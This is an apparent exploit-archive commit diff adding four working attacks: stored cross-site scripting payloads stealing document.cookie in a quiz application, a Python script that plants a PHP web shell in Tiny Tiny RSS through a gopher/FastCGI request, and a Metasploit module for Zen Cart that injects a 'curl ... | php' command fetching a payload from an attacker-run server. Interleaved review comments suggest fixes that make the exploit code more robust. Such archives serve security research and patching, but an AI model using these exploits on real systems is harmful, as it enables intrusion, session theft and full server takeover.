DB: 2021-03-03
4 changes to exploits/shellcodes

Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
Tiny Tiny RSS - Remote Code Execution
Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
Zen Cart 1.5.7b - Remote Code Execution (Authenticated)
This commit is contained in:
parent
75667550f6
commit
b35005d47b
5 changed files with 402 additions and 0 deletions
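--- a/exploits/php/webapps/49605.txt
+++ b/exploits/php/webapps/49605.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: Praharsh Kumar Singh
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+# Vulnerability Type: Cross-site Scripting
+# Vulnerability: Persistent/Stored XSS
+# Tested on: Parrot OS
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in adding questions in options parameter affected from this vulnerability.
+# payload: </script><script >alert(document.cookie)</script>
+
+POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 101
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
+Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+
+qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
+
+POC:
+# go to url http://localhost:8080/admin.php
+# login and add question
+# then put the above payload in MCQ options parameter
+# then fill the remaining details
+# then click add
+# go to url http://localhost:8080/login.php
+# then login to user account
+# then attempt the quiz while attempting the quiz xss pop up there..!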
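Review bot: The captured request and the reproduction steps disagree on the target: the request is sent to `Host: localhost` under `/onlinequiz_0/`, while the lines under `POC:` point at `http://localhost:8080/admin.php` and `http://localhost:8080/login.php` with no application path, so a reader has to guess which base URL is the one that was tested; both should name the same one. The advisory identifies the sink (option text rendered while the quiz is attempted) but says nothing about cause or remediation, which is what a defender reading the entry needs; a closing line such as `# Fix: HTML-encode the stored option text on output (e.g. htmlspecialchars) before rendering it into the quiz page — presumably the output is written unescaped, verify against the application source` would close that gap. The same remediation note is missing from 49607.txt for the registration `name` field rendered in the ranking section.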
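--- a/exploits/php/webapps/49606.py
+++ b/exploits/php/webapps/49606.py
@@ -0,0 +1,83 @@
+# Exploit Title: Tiny Tiny RSS - Remote Code Execution
+# Date: 21/09/2020
+# Exploit Author: Daniel Neagaru & Benjamin Nadarević
+# Blog post: https://www.digeex.de/blog/tinytinyrss/
+# Software Link: https://git.tt-rss.org/fox/tt-rss
+# Version: all before 2020-09-16
+# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
+# Tested on: default docker installation method
+# CVE : CVE-2020-25787
+
+#!/usr/bin/env python3
+
+from sys import argv
+import urllib.parse as ul
+import base64
+
+
+def CustomFcgi( filename, output, backdoor):
+    length=len(output)+len(backdoor)+64
+    char=chr(length)
+
+    data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
+    data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
+    data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
+
+    temp1 = chr(len(data) // 256)
+    temp2 = chr(len(data) % 256)
+    temp3 = chr(len(data) % 8)
+
+    end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
+    end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"
+    start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
+
+    payload = start + data + end
+    def get_payload(payload):
+        finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
+        return finalpayload
+
+    return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
+
+
+
+TTRSS_PATH = "/var/www/html/tt-rss/"
+BACKDOOR_CODE = """
+<?php
+echo "success\n";
+echo system($_GET['cmd']);
+?>
+"""
+
+
+feed_file = open("malicious_RCE_feed.xml",'w')
+filename = TTRSS_PATH + "config.php"
+output = TTRSS_PATH + "backdoor.php"
+
+backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
+rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
+
+feed ="""<?xml version="1.0" encoding="UTF-8" ?>
+<rss version="2.0">
+
+<channel>
+<title>Exploit demo - rce</title>
+<link></link>
+<description>You are getting infected :(</description>
+<item>
+<title> Check if there is backdoor.php</title>
+<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
+<description>
+<![CDATA[
+Dummy text
+
+<img src="{}">
+
+]]>
+</description>
+</item>
+</channel>
+</rss>
+""".format(rce)
+
+feed_file.write(feed)
+feed_file.close()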
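Review bot: `feed_file` is opened with a bare `open()` before any of the payload is built and only closed on the last line, so if `CustomFcgi` or the `.format(rce)` call raises, the handle leaks and a zero-length `malicious_RCE_feed.xml` is left on disk; the open and the two trailing lines should become `with open("malicious_RCE_feed.xml", "w") as feed_file: feed_file.write(feed)`. `from sys import argv` is never used and should be removed, and the `#!/usr/bin/env python3` line sits eleventh in the file, below the header comments, where it is an ordinary comment rather than a shebang. `CustomFcgi` has no docstring; it should say that it assembles FastCGI records for a php-fpm listener assumed at `localhost:9000` (hard-coded in the returned `gopher://` URL) and that `TTRSS_PATH` is assumed to be the default docker install path, since both are silent preconditions that a reader cannot see from the call site.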
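--- a/exploits/php/webapps/49607.txt
+++ b/exploits/php/webapps/49607.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: P.Naveen Kumar
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software : Web Based Quiz System
+# Version : 1.0
+# Vulnerability Type : Cross-site Scripting
+# Vulnerability : Persistent/Stored XSS
+# Tested on: Windows 10 Pro
+
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in registration form in name parameter affected from this vulnerability.
+# payload: <script>alert(document.cookie)</script>
+
+# HTTP POST request
+POST http://localhost:8080/quiz/register.php HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
+Content-Length: 690
+Origin: http://localhost:8080
+Connection: keep-alive
+Referer: http://localhost:8080/quiz/register.php
+Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
+Upgrade-Insecure-Requests: 1
+
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="name"
+
+<script>alert(document.cookie)</script>
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="email"
+
+test123@gmail.com
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="password"
+
+Hacker
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="college"
+
+hello
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------283640616528311462411171270636--
+
+POC:
+# go to url http://localhost:8080/quiz/register.php
+# then you have to fill the above payload in name/username parameter
+# then fill the remaining details
+# then click submit
+# then login to user account
+# then attempt any one quiz after attempting go to ranking section then
+# you can see xss pop up there..!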
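--- a/exploits/php/webapps/49608.rb
+++ b/exploits/php/webapps/49608.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+#
+# This exploit write payload in database and trig to command
+# a bug in an zencart v1.5.7b web application
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'zencart authenticated remote code execution exploit',
+        'Description' => %q(
+          This exploit module execution os command in zencart.
+        ),
+        'License' => MSF_LICENSE,
+        'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc
+        'References' =>[
+          [ 'OSVDB', '' ],
+          [ 'EDB', '' ],
+          [ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
+          [ 'CVE', '2021-3291']
+        ],
+        'Platform' => 'php',
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [ ['Automatic', { }] ],
+        'DisclosureDate' => '2021-01-22',
+        'DefaultTarget' => 0
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ true, 'Password to login with', '']),
+        OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
+        OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
+        OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
+        OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
+      ], self.class
+    )
+  end
+
+  def start_server
+    ssltut = false
+    if datastore["SSL"]
+      ssltut = true
+      datastore["SSL"] = false
+    end
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+    print_status("payload is on #{get_uri}")
+    @adresim = get_uri
+    datastore['SSL'] = true if ssltut
+  end
+
+  def on_request_uri(cli, request)
+    print_good('First stage is executed ! Sending 2nd stage of the payload')
+    send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
+  end
+
+  def tabanyol
+    datastore["BASEPATH"]
+  end
+
+  def isim
+    datastore["USERNAME"]
+  end
+
+  def parola
+    datastore["PASSWORD"]
+  end
+
+
+  def login
+    #"index.php?cmd=login&camefrom=index.php"
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+      'vars_get' => {
+        'cmd' => 'login',
+        'camefrom' => 'index.php'
+      })
+    # <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
+    unless res
+      fail_with(Failure::Unreachable, "Access web application failure")
+    end
+    if res.code != 200
+      fail_with(Failure::Unreachable, "we not have 200 response")
+    end
+
+    if !res.get_cookies.empty?
+      @cookie = res.get_cookies
+      @csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
+      if @csrftoken.empty?
+        fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+      end
+      vprint_good("login Csrf token: "+@csrftoken)
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'securityToken' => @csrftoken,
+        'action' => "do"+@csrftoken,
+        'admin_name' => isim,
+        'admin_pass' => parola
+      })
+    if res.code != 302
+      fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+    end
+    true
+  end
+
+
+  def check
+    unless login
+      fail_with(Failure::UnexpectedReply, 'Wrong credentials')
+      return CheckCode::NotVulnerable('Wrong credentials')
+    end
+    print_good("We loged in")
+    Exploit::CheckCode::Vulnerable
+    CheckCode::Vulnerable('Authenticated successfully')
+
+  end
+
+  def exploit
+    check
+    start_server
+    sleep(4)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+      'vars_get' => {
+        'cmd' => 'modules',
+        'set' => datastore["MODULE"],
+        'module' => datastore["SETTING"],
+        'action' => 'edit'
+      },
+      'cookie' => @cookie
+    )
+    if res.code != 200
+      fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
+    end
+    # <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
+    if res && res.code == 200
+      @formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
+      if @formtoken.empty?
+        fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
+      end
+      #print_good(@formtoken)
+      # <form name="modules"
+      @radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
+      @selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
+      @textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
+      @secme = {}
+      @secme["securityToken"] = @formtoken
+      for @a in @radiolar
+        @secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
+      end
+      for @a in @selectler
+        @secme["configuration[#{@a[0]}]"] = "0"
+      end
+      for @a in @textarr
+        @secme["configuration[#{@a[0]}]"] = "0"
+      end
+      print_good(@secme.to_s)
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+        'cookie' => @cookie,
+        'vars_get' => {
+          'cmd' => 'modules',
+          'set' => datastore["MODULE"],
+          'module' => datastore["SETTING"],
+          'action' => 'save'
+        },
+        'vars_post' => @secme
+      )
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+        'vars_get' => {
+          'cmd' => 'modules',
+          'set' => datastore["MODULE"],
+          'module' => datastore["SETTING"],
+          'action' => 'edit'
+        },
+        'cookie' => @cookie
+      )
+
+    end
+  end
+end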
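Review bot: In `exploit`, `res.code` is dereferenced in the `if res.code != 200` check before the `if res && res.code == 200` nil guard that follows it, so an unreachable host raises NoMethodError instead of a clean module failure; put `fail_with(Failure::Unreachable, 'No response from target') unless res` ahead of the status check and drop the now-redundant second guard. In `login`, the `res.code != 302` branch reuses the message `'There is no CSRF token at HTTP response.'`, which misdescribes a rejected login; `fail_with(Failure::NoAccess, 'Login failed: expected 302 redirect')` says what actually happened. In `check`, the bare `Exploit::CheckCode::Vulnerable` on the line before the return is a no-op expression and the `return` after `fail_with` is unreachable, and a successful admin login by itself does not establish the affected 1.5.7b version, so the honest result there is `CheckCode::Detected` unless a version check is added. `References` still carries empty `'OSVDB'` and `'EDB'` entries, which should be filled in or removed before the module is indexed.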
|
@ -43793,3 +43793,7 @@ id,file,description,date,author,type,platform,port
|
|||
49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple,
|
||||
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
|
||||
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
|
||||
49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",2021-03-02,"Praharsh Kumar Singh",webapps,php,
|
||||
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
|
||||
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
|
||||
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
|
||||
|
|
|